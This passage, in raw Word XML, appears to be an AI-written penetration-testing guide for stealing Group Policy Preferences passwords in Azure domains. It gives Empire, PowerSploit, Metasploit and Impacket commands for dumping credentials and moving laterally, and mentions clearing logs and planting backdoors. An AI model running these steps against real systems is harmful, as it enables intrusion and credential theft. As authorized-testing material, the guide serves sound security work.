          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B93E01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2.4 Use PowerShell Empire Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C84C6" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t># In Empire:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CEAD05" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>usemodule privesc/gpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD073DC" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F966A2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Retrieves plaintext passwords pushed through GPP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E33908" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="6E81862A">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="000FBC21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2.5 Run PowerSploit's Get-GPPPassword.ps1 Locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B0F7C1" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>Import-Module .\Get-GPPPassword.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1DA909" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>Get-GPPPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EACAE9" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Finds plaintext passwords from all relevant GPP XML files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477243D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="7A04F63C">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B5F899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Phase 3: Post-Exploitation — Lateral Movement &amp; Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150EE784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3.1 Use Dumped Credentials for Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D475F0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use wmiexec.py or psexec.py (Impacket) with dumped creds to move laterally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD60DD" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>python wmiexec.py &lt;domain&gt;/&lt;user&gt;:&lt;password&gt;@&lt;target_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7839CEAE" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="2B675B1A">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBAE597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3.2 Check for Privileges and Escalate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0906BFC7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use PowerShell or Metasploit to enumerate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F7FAAD" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Attempt privilege escalation with available exploits or misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58A054" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="371EBF4D">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="090B9C6C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Phase 4: Cleanup &amp; Persistence (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7C8FE9" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Clear logs or plant backdoors as needed, respecting your engagement scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA9ABB8" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="319DB20F">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2D9605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Additional Recommendations for Azure Pentesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E13867" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Check Azure NSG and firewall rules for SMB port (445) exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D812F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use Azure Run Command or Custom Script Extensions to run scripts remotely on VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91EA00" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use Microsoft Defender for Cloud to monitor SYSVOL access or unusual SMB traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECADAA4" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Consider exploiting cached GPP files on domain-joined endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67329AD8" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="09C4AF10">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6B456F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B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5219"/>
        <w:gridCol w:w="2912"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="59AB0DA4" w14:textId="77777777" w:rsidTr="003955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37B8D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697B"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06B7D453" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Commands/Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5559309E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="1A5D3DD5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72A2B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Validate SYSVOL Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69596213" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>smbclient //DC_IP/SYSVOL -U user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2514646C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Confirm readable GPP XML files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="5EE11F56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9C982" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Metasploit SMB Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26542B63" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>auxiliary/scanner/smb/smb_enum_gpp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0611406C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Remote dump &amp; decrypt cpasswords</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="429303AE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C179B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Meterpreter Post Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CA28EB2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>post/windows/gather/credentials/gpp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23490008" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Local cached GPP creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="61DCC3FB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0FCB6" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Manual SMB Download &amp; Decrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49EB8511" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>smbclient + gpp-decrypt or gp3finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B5CCACB" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Manual extraction &amp; decryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="7163B327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7664C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>PowerShell Empire Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CFC63F3" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>privesc/gpp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09934250" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Powershell-based credential extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="3B1738B0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CD2EF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>PowerSploit Get-GPPPassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A94E6B9" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Import-Module Get-GPPPassword.ps1; Get-GPPPassword</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D64477B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Local powershell script to dump creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="45B3C052" w14:textId="77777777" w:rsidTr="003955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68D49" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BC6D8BA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>wmiexec.py, psexec.py Impacket tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36751BAE" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Use dumped creds for lateral access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BE5E907" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="597CA279">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E295FD9" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>If you want, I can generate automation scripts (Bash, PowerShell) that chain these steps to speed up your pen testing workflow on Azure. Would you like me to prepare those?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070A66C4" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRDefault="00C311DB"/>
    <w:sectPr w:rsidR="00C311DB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4F0D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C3A6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D0468"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EFC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841BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B11E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67C79"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20A2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07BE5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A72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F29FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CBA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E27F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F54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CC0190"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="21E4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EE06AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B018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C13240"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FAC6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AC5CE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5456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74342F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7C00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723C88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D890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F54642"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FC8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A95620"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BEC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5E6CAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09CA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66239E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="449E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F76EC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EAE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B56230"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DF4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E5026C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1496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C17012"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5276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F31619"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EACE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0B2159"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="02DA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8A408C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E4E4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E12DDC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25FA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CA7FB1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0B8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D01E9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="293C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A94293"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A62C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2E2257"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26BA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3E7DBC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBDE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8D4FB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B66C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3B2986"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8230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82422B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54F2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9818C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D082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F64659"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1364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873156"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6C8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89496C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B5A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AE46B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE0E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BB6DF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9796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7C3C79"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F50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791EA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C38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543EB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77CA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886900"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DECA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4C14A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30C0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FC6123"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8AAE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5B576C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B0E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465AF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC5A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31580E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1C6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6F0B32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5682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9E0463"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ED822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B73DD5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7F8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2E1318"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4778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35563">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1495030959">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1038047687">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1321348112">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="293292398">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="974454942">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1745715031">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="860163573">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1688168344">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="847866466">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1709839024">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1904679795">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1701055652">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1344824116">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="194120362">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1232812042">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="133181026">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="843977182">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2012220779">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1259678842">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1121340443">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1169367817">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="63649709">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1855223755">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="549464015">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1676111650">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1406411021">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="376515683">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="2116628754">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="663095016">
    <w:abstractNumId w:val="32"/>
  </w:num>
